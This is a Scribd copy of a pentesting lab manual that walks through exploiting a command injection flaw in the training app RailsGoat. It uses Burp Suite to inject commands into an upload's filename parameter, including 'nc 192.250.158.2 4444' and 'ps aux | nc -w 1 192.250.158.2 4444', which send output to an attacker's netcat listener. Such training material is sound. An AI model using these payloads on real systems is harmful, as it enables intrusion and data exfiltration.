Scribd
Upload
127 views

Lab Manual - Command Injection III

This document outlines steps to exploit a command injection vulnerability in a web application called RailsGoat running on port 3000 of a target machine at IP 192.250.158.3. The steps include using Burp Suite to intercept an upload request, modifying the request to inject commands that start a netcat listener, and using that listener to obtain a shell on the target system and run commands like ps aux.

Uploaded by

huynhphuc112
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
127 views

Lab Manual - Command Injection III

This document outlines steps to exploit a command injection vulnerability in a web application called RailsGoat running on port 3000 of a target machine at IP 192.250.158.3. The steps include using Burp Suite to intercept an upload request, modifying the request to inject commands that start a netcat listener, and using that listener to obtain a shell on the target system and run commands like ps aux.

Uploaded by

huynhphuc112
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

Name Command Injection III

URL https://attackdefense.com/challengedetails?cid=1907

Type Webapp Pentesting Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and ___domain names might be
different in your lab.

Step 1:​ Determining the IP address of the target machine.

Command:​ ifconfig
The IP address of the host machine is 192.250.158.2. Therefore, the target machine will have IP
address 192.250.158.3

Step 2:​ Scan the target machine using nmap.

Command:​ nmap 192.250.158.3

We have discovered that port 3000 is open on the target machine.

Step 3:​ Interacting the application available on port 3000 of the target machine.

Open the following URL in firefox:

URL:​ http://192.250.158.3:3000
RailsGoat is hosted on the target machine.

Step 4: ​Click on “Tutorial Credentials” button on the top header to view the login credentials.
Click on “I understand” button and get the credentials:

Login using the following credentials:


Email:​ [email protected]
Password:​ admin1234

After Login:
Step 5: ​Navigate to “BENEFIT FORMS” option:

Step 6: ​Click on the Browse button and select the README file from Desktop
Step 7:​ Configure Firefox to use Burp Suite. Click on the FoxyProxy plugin icon on the top-right
of the browser and select "Burp Suite".

Step 8: ​Start Burp Suite, Navigate to Web Application Analysis Menu and select "burpsuite".
Click Next
Click on Start Burp

Step 9: ​Click on Start Upload button to upload the selected README file. The request will be
intercepted by Burp Suite.

The intercepted request will appear in the Proxy Tab of burp suite.
Step 10: ​Send the intercepted request to Repeater
Step 11: ​Start a netcat listener on the host machine.

Command:​ nc -lvp 4444

Step 12: ​In the repeater tab of Burp Suite, Change the value of "benefits[backup]" parameter to
"true" and inject the command injection payload in the filename parameter.

Modify the following highlighted payload:


Due to command injection vulnerability, the content after ";" i.e "nc 192.250.158.2 4444" will be
treated as another command and it will result in connection being received on the netcat
listener.

Click on the "Send" button to send the request.

A connection will be received on the netcat listener.

There exists a command injection vulnerability.

Step 13: ​Start the netcat listener with the keep-alive option (-k). The Keep-alive option will allow
multiple connections to be made to the same netcat listener.

Command:​ nc -klvp 4444


Step 14: ​Execute a command and pipe it's output to the netcat connection. Modify the filename
parameter value in the request (in Repeater tab).

Command: ​nc -w 1 192.250.158.2 4444

The -w option will make the connection to time out after 1 second.

Send the above request:


The output of the command will be displayed on the netcat listener.

Step 15: ​Modify the command in the Repeater window to list the processes running on the
target machine.

Command: ​ps aux | nc -w 1 192.250.158.2 4444


Click on the send button to send the request.

The processes running on the target machine will be listed on the netcat listener.

References:

1. OWASP A1 Injection
(​https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A1-Inject
ion​)
2. OWASP Top 10 (​https://owasp.org/www-project-top-ten/​)
3. RailsGoat (​https://railsgoat.cktricky.com/​)

You might also like